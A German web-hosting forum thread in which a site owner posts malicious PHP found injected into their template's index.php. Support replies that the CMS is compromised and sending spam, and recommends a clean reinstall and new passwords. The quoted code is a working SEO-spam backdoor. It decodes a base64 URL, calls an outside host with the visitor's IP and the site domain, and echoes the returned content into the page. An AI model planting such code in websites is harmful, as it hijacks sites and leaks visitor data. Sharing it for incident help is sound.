Curl_exec

Hallo, mir ist heute bei meiner Website etwas aufgefallen, und zwar erscheint auf einmal eine Warnmeldung die ihr unten im Bild "ubenannt"sehen könnt.
Ein bekannter hat den Code der auf einmal in der Index.php meines Templates eingefügt war mal aufgeschlüsselt und das kam dabei heraus:

<?php $s2 = "aHR0cDovL3d3dy53d3d0ZWxlY29tc2VydmljZS5jb20vbGluay9saW5rcy02NS5odG1s"; // base64_encode: [wwwtelecomservice.com/link/links-65.html](http://www.wwwtelecomservice.com/link/links-65.html) if (!function_exists('b1')) { function b1($u) { $ch = curl_init(); $t = 90; curl_setopt($ch, 10002, $u); curl_setopt($ch, 19913, 1); curl_setopt($ch, 78, $t); curl_setopt($ch, 13, $t); $d = curl_exec($ch); if ($d === false) { $e = curl_error($ch); echo ""; } curl_close($ch); return $d; } } if (!function_exists('a1')) { function a1($p) { $p = rtrim($p, '/') . '/'; return $p; } } $i = $_SERVER['REMOTE_ADDR']; $p = trim(base64_decode($s2)); $di = dirname($p); $fi = basename($p); $o = $_SERVER['HTTP_HOST']; $u = a1($di) . "readf2.php" . "?password=systemseo&filename=" . $fi . "&ip=" . $i . "&domain=" . $o; echo ""; $c = b1($u); echo $c; echo ""; ?>

Dann ist mir etwas aufgefallen als ich mich per FTP einloggen wollte und zwar bekomme ich eine Warnmeldung diese seht ihr im Bild ubenannt_1

hallo

also das mit dem Zertifikat ist soweit okay, jedoch nicht das mit curl_exec; dein CMS ist offenbar kompromittiert, dafür sprechen auch unsere Aufzeichnungen und eingegangene Beschwerden. Nämlich, dass hier Spam von Deinem Konto aus verschickt wurde.

Hast Du hierfür zu den auf Deinem Konto eingesetzen CMS bzw. der Software auch immer Updates eingespielt …?

In jedem Fall bleibt hier nur die Empfehlung bitte alles mögliche vom Webspace runterzulöschen und die Seite unter verwendung einer aktuellen CMS-Version neu aufzusetzen - bitte stelle auch sicher, überall die Passwörter zu ändern.

ciao